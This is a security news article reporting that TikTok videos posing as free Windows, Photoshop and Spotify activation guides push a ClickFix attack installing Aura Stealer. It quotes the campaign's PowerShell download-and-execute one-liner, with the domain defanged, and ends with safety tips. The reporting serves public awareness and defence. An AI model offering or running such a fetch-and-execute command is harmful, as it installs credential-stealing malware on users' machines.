HOME >Security news

TikTok Videos Still Spreading Infostealer Malware via ClickFix Attacks

Amaan Rizwan
TikTok fraud through clickfraud

Cybercriminals are tricking people with TikTok videos that look like free activation guides for popular softwareโ€”such as Windows, Spotify, and Netflix but actually spread malware that steals your information.

These fake videos claim to show how to activate things like Windows, Microsoft 365, Photoshop, and Discord Nitro, but their real purpose is to infect viewers’ devices.

What is Happening?

These videos use a ClickFix attack which is a social engineering trick that looks like a helpful fix, but actually convinces users to run harmful PowerShell commands or scripts that install malware.

Each video shows a quick, single-line command and instructs viewers to enter it in PowerShell as an administrator.

They make them run script commands such as below.

iex (irm slmgr[.]win/photoshop)

 

The URL shown in these fake videos changes based on the software being impersonated so a Windows activation scam will use a link with “windows” in it instead of “photoshop.” When users run the recommended command, PowerShell connects to a remote site (slmgr[.]win) to fetch and execute more malicious scripts.

This script downloads two files from Cloudflare pagesโ€”the first (โ€œupdater.exeโ€) is Aura Stealer, which grabs browser passwords, cookies, crypto wallets, and app credentials, then uploads them to attackers.

A second file (โ€œsource.exeโ€) is also downloaded, which compiles more malicious code and launches it in memory.

How to Stay Safe?

  • Never run commands copied from a website directly into PowerShell, Command Prompt, File Explorer address bar, Mac or Linux terminal unless you totally trust the source.

  • Always look for official support or updates from the softwareโ€™s real website.

  • Check for HTTPS and domain spelling:ย Look for “https://” and double-check the spelling of website addresses before downloading anything.

  • Turn on two-factor authentication:ย Add extra protection to your accounts, so even if your password is stolen, attackers cannot log in easily.

  • Backup important data:ย Keep copies of important files in case malware leads to data loss or lockout.

Amaan Rizwan
Amaan Rizwan
Anything and everything because titles should not define us. A non-fiction lover. Khalid Hosseini and Ruskin Bond fan. Aspiring to be better than yesterday.
spot_img

Read More

Suggested Post